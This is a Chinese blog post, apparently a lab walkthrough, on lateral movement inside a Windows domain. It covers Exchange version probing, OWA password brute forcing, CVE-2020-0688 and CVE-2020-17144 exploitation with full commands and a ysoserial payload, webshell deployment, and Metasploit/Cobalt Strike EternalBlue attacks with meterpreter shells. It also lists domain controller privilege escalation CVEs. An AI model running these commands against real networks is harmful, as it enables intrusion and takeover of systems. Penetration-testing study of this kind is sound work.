内网渗透之横向移动Exchange&ms17-010&域控提权漏洞CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923

0x01横向移动Exchange

环境0day.org
Exchange是一种windows邮件服务器
1.端口扫描
exchange会对外暴露接口如OWA,ECP等,会暴露在80端口,而且25/587/2525等端口上会有SMTP服务
2.SPN扫描
可以不加powershell

powershell setspn -T 0day.org -q */*

在这里插入图片描述
3.脚本探针(可开代理,需要修改hosts文件将主机名域名加入hosts文件)
在这里插入图片描述
会把版本和有漏洞的版本进行匹配

python Exchange_GetVersion_MatchVul.py xxxx

0x02域横向移动 Exchange爆破

1.爆破
开启socks代理,burp抓包进行爆破,发现更多用户名
登录地址
https://owa2010sp3.0day.org/owa
在这里插入图片描述
burp抓包设置变量爆破
在这里插入图片描述

0x03 域横向移动 Exchange漏洞

确定内核版本-筛选Server版本-确定漏洞对应关系-选择漏洞进行漏洞
右键查看源代码发现版本,然后通过这个版本找server是2010还是2016等,在找响应的漏洞
在这里插入图片描述

CVE-2020-0688 复现
python版本3.8,3.7
安装requests库
pyreadline库

python -m pip install requests
python -m pip install pyreadline

安装失败就升级pip版本

python -m pip install --upgrade pip

执行calc命令

python cve-2020-0688.py -s https://owa2010sp3.0day.org -u jack@0day.org -p admin!@#45 -c calc

生成payload

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="17d6490d-6ea8-4dc5-81bb-55b15f775d80" --isdebug -islegacy

输入到cmd中,执行
在这里插入图片描述

CVE-2020-17144 复现
漏洞是用c#写的,可以编译成exe,在一个文件中写入shell,然后在在编译,在运行,使用蚁剑连接即可 shell在ExploitClass.cs写入

CVE-2020-17144.exe  owa2010sp3.0day.org jack@0day.org admin!@#45

在这里插入图片描述

0x04 横向移动 ms17-010 msf&cs联动

cs只有ms17-010的检测,没有利用exp,需要发送到msf进行利用
横向移动可以直接利用漏洞来攻击主机
msf&cs联动 攻击ms17-010
1.cs创建外联监听器
在这里插入图片描述
2.cs执行联动MSF

msf-ip 8888 
spawn msf    监听器的名称

3.msf配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888

成功反弹到msf
在这里插入图片描述
4.添加路由

run post/multi/manage/autoroute 
或
run autoroute -s 192.168.3.0/24

5.检测ms17-010

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.3.21-32
run

6.利用ms17-010

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.3.31
set rhosts 192.168.3.31
run

在这里插入图片描述

0x05 横向移动 域控提权漏洞

CVE-2014-6324
前提条件:
1.一个域内普通账号
2.并取得主机的权限
CVE-2020-1472
CVE-2021-42287
前提条件:一个域内普通账号
CVE-2022-26923
前提条件:
1.一个域内普通账号
2.域内存在证书服务器

已经复现过了,不在复现
域控提权
域控提权

posted @ 2023-08-03 19:21  mushangqiujin  阅读(97)  评论(0)    收藏  举报  来源